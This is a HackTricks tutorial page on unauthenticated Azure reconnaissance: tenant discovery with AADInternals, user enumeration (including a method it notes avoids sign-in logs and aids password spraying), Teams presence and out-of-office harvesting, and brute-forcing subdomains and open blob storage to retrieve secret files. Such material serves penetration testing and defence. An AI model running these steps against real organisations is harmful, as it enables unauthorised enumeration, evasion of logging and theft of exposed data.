Az - Unauthenticated Enum & Initial Entry

Reading time: 8 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

There are some public Azure APIs that just knowing the domain of the tenant an attacker could query to gather more info about it.
You can query directly the API or use the PowerShell library AADInternals:

API	Information	AADInternals function
login.microsoftonline.com/<domain>/.well-known/openid-configuration	Login information, including tenant ID	`Get-AADIntTenantID -Domain <domain>`
autodiscover-s.outlook.com/autodiscover/autodiscover.svc	All domains of the tenant	`Get-AADIntTenantDomains -Domain <domain>`
login.microsoftonline.com/GetUserRealm.srf?login=<UserName>	Login information of the tenant, including tenant Name and domain authentication type. If `NameSpaceType` is `Managed`, it means AzureAD is used.	`Get-AADIntLoginInformation -UserName <UserName>`
login.microsoftonline.com/common/GetCredentialType	Login information, including Desktop SSO information	`Get-AADIntLoginInformation -UserName <UserName>`

You can query all the information of an Azure tenant with just one command of the AADInternals library:

powershell

Invoke-AADIntReconAsOutsider -DomainName corp.onmicrosoft.com | Format-Table

Output Example of the Azure tenant info:

Tenant brand:       Company Ltd
Tenant name:        company
Tenant id:          1937e3ab-38de-a735-a830-3075ea7e5b39
DesktopSSO enabled: True

Name                           DNS   MX    SPF  Type      STS
----                           ---   --    ---  ----      ---
company.com                   True  True  True  Federated sts.company.com
company.mail.onmicrosoft.com  True  True  True  Managed
company.onmicrosoft.com       True  True  True  Managed
int.company.com              False False False  Managed

It's possible to observe details about the tenant's name, ID, and "brand" name. Additionally, the status of the Desktop Single Sign-On (SSO), also known as Seamless SSO, is displayed. When enabled, this feature facilitates the determination of the presence (enumeration) of a specific user within the target organization.

Moreover, the output presents the names of all verified domains associated with the target tenant, along with their respective identity types. In the case of federated domains, the Fully Qualified Domain Name (FQDN) of the identity provider in use, typically an ADFS server, is also disclosed. The "MX" column specifies whether emails are routed to Exchange Online, while the "SPF" column denotes the listing of Exchange Online as an email sender. It is important to note that the current reconnaissance function does not parse the "include" statements within SPF records, which may result in false negatives.

User Enumeration

It's possible to check if a username exists inside a tenant. This includes also guest users, whose username is in the format:

<email>#EXT#@<tenant name>.onmicrosoft.com

The email is user’s email address where at “@” is replaced with underscore “_“.

With AADInternals, you can easily check if the user exists or not:

powershell

# Check does the user exist
Invoke-AADIntUserEnumerationAsOutsider -UserName "user@company.com"

Output:

UserName         Exists
--------         ------
user@company.com True

You can also use a text file containing one email address per row:

user@company.com
user2@company.com
admin@company.com
admin2@company.com
external.user_gmail.com#EXT#@company.onmicrosoft.com
external.user_outlook.com#EXT#@company.onmicrosoft.com

powershell

# Invoke user enumeration
Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider -Method Normal

There are three different enumeration methods to choose from:

Method	Description
Normal	This refers to the GetCredentialType API mentioned above. The default method.
Login	This method tries to log in as the user. Note: queries will be logged to sign-ins log.
Autologon	This method tries to log in as the user via autologon endpoint. Queries are not logged to sign-ins log! As such, works well also for password spray and brute-force attacks.

After discovering the valid usernames you can get info about a user with:

powershell

Get-AADIntLoginInformation -UserName root@corp.onmicrosoft.com

The script o365creeper also allows you to discover if an email is valid.

powershell

# Put in emails.txt emails such as:
# - root@corp.onmicrosoft.com
python.exe .\o365creeper\o365creeper.py -f .\emails.txt -o validemails.txt

User Enumeration via Microsoft Teams

Another good source of information is Microsoft Teams.

The API of Microsoft Teams allows to search for users. In particular the "user search" endpoints externalsearchv3 and searchUsers could be used to request general information about Teams-enrolled user accounts.

Depending on the API response it is possible to distinguish between non-existing users and existing users that have a valid Teams subscription.

The script TeamsEnum could be used to validate a given set of usernames against the Teams API.

bash

python3 TeamsEnum.py -a password -u <username> -f inputlist.txt -o teamsenum-output.json

Output:

[-] user1@domain - Target user not found. Either the user does not exist, is not Teams-enrolled or is configured to not appear in search results (personal accounts only)
[+] user2@domain - User2 | Company (Away, Mobile)
[+] user3@domain - User3 | Company (Available, Desktop)

Furthermore it is possible to enumerate availability information about existing users like the following:

Available
Away
DoNotDisturb
Busy
Offline

If an out-of-office message is configured, it's also possible to retrieve the message using TeamsEnum. If an output file was specified, the out-of-office messages are automatically stored within the JSON file:

jq . teamsenum-output.json

Output:

json

{
  "email": "user2@domain",
  "exists": true,
  "info": [
    {
      "tenantId": "[REDACTED]",
      "isShortProfile": false,
      "accountEnabled": true,
      "featureSettings": {
        "coExistenceMode": "TeamsOnly"
      },
      "userPrincipalName": "user2@domain",
      "givenName": "user2@domain",
      "surname": "",
      "email": "user2@domain",
      "tenantName": "Company",
      "displayName": "User2",
      "type": "Federated",
      "mri": "8:orgid:[REDACTED]",
      "objectId": "[REDACTED]"
    }
  ],
  "presence": [
    {
      "mri": "8:orgid:[REDACTED]",
      "presence": {
        "sourceNetwork": "Federated",
        "calendarData": {
          "outOfOfficeNote": {
            "message": "Dear sender. I am out of the office until March 23rd with limited access to my email. I will respond after my return.Kind regards, User2",
            "publishTime": "2023-03-15T21:44:42.0649385Z",
            "expiry": "2023-04-05T14:00:00Z"
          },
          "isOutOfOffice": true
        },
        "capabilities": ["Audio", "Video"],
        "availability": "Away",
        "activity": "Away",
        "deviceType": "Mobile"
      },
      "etagMatch": false,
      "etag": "[REDACTED]",
      "status": 20000
    }
  ]
}

Azure Services

Know that we know the domains the Azure tenant is using is time to try to find Azure services exposed.

You can use a method from MicroBust for such goal. This function will search the base domain name (and a few permutations) in several azure service domains:

powershell

Import-Module .\MicroBurst\MicroBurst.psm1 -Verbose
Invoke-EnumerateAzureSubDomains -Base corp -Verbose

Open Storage

You could discover open storage with a tool such as InvokeEnumerateAzureBlobs.ps1 which will use the file Microburst/Misc/permitations.txt to generate permutations (very simple) to try to find open storage accounts.

powershell

Import-Module .\MicroBurst\MicroBurst.psm1
Invoke-EnumerateAzureBlobs -Base corp
[...]
https://corpcommon.blob.core.windows.net/secrets?restype=container&comp=list
[...]

# Access https://corpcommon.blob.core.windows.net/secrets?restype=container&comp=list
# Check: <Name>ssh_info.json</Name>
# Access then https://corpcommon.blob.core.windows.net/secrets/ssh_info.json

SAS URLs

A shared access signature (SAS) URL is an URL that provides access to certain part of a Storage account (could be a full container, a file...) with some specific permissions (read, write...) over the resources. If you find one leaked you could be able to access sensitive information, they look like this (this is to access a container, if it was just granting access to a file the path of the URL will also contain that file):

https://<storage_account_name>.blob.core.windows.net/newcontainer?sp=r&st=2021-09-26T18:15:21Z&se=2021-10-27T02:14:21Z&spr=https&sv=2021-07-08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D

Use Storage Explorer to access the data